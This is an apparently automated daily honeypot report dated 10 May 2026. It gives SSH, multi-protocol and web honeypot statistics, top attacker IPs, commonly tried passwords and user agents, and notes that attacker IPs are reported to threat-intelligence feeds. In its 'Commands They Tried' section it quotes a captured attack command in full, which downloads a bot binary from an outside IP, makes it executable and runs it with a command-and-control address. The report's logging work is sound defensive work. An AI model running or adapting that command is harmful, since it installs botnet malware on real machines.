Sunday, 10 May 2026 ๐Ÿ”ด high

Daily Threat Report

993 SSH Connections
960 Login Attempts
197 Commands Run
96 SSH Unique IPs
154 Protocol Events
9 Protocol IPs
180 Web Honeypot Hits
46 Web Honeypot IPs

Top Attacker IPs

  1. ๐ŸŒ 176.65.132.129 BGPโ†—
  2. ๐ŸŒ 87.251.64.176 BGPโ†—
  3. ๐ŸŒ 2.57.122.238 BGPโ†—
  4. ๐ŸŒ 192.95.10.220 BGPโ†—
  5. ๐ŸŒ 192.95.10.214 BGPโ†—

Top Passwords Tried

  1. 123456
  2. admin
  3. 123
  4. 12345678
  5. 1234

๐ŸŒ WEB HONEYPOT โ€” Galah LLM

AI-generated fake HTTP responses served to 180 scanner requests from 46 unique IPs. Model: qwen2.5:0.5b (local, offline).

Top Paths Probed

  1. /
  2. /SDK/webLanguage
  3. /sitemap.xml
  4. /login
  5. www.google.com:443

Top User-Agents

  1. Mozilla/5.0 (Windows NT 10.0
  2. Win64
  3. x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  4. Go-http-client/1.1
  5. Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko
  6. compatible
  7. ClaudeBot/1.0
  8. +claudebot@anthropic.com)
  9. Mozilla/5.0 (compatible
  10. CensysInspect/1.1
  11. +https://about.censys.io/)
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
โ†’ 3 IPs โ†’ AbuseIPDB  (community confidence scores updated)
โ†’ 3 IPs โ†’ AlienVault OTX  (pulse indicators added)
โ†’ 3 IPs โ†’ Blocklist.de  (auto-ban list updated)
โ†’ 3 IPs โ†’ DShield/SANS  (global threat feed updated)

๐Ÿคฃ ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

๐Ÿ”‘ Hall of Shame โ€” Passwords

admin
password
ubuntu
1qaz@WSX
admin123

๐Ÿ’ป Commands They Tried

id; cd /tmp || cd /var || cd /dev/shm || cd /; rm -f .x 2>/dev/null; wget -U Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 -q -O .x http://91.214.78.173:5050/payloads/bot-amd64 2>/dev/null || busybox wget -q -O .x http://91.214.78.173:5050/payloads/bot-amd64 2>/dev/null || curl -A Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 -s -o .x http://91.214.78.173:5050/payloads/bot-amd64 2>/dev/null || tftp -g -l .x -r payloads/bot-amd64 91.214.78.173 2>/dev/null; chmod 777 .x 2>/dev/null; ls -la .x 2>/dev/null; ./.x --c2 91.214.78.173:5052 & sleep 3; ps | grep [.]x; cat /proc/meminfo 2>/dev/null | head -1
uname -m
uname -s -m
uname -s -v -n -r -m

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 10 de May de 2026. Recorded 993 SSH connections on the Cowrie honeypot and 154 multi-protocol events on OpenCanary, from 105 unique IPs. 3 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 960 login attempts from 96 unique IPs. Attackers executed 197 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 154 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 9 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 180 HTTP requests from real scanners across 46 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

โ† All Reports ๐Ÿ›ก๏ธ Subscribe to blocklists โ†’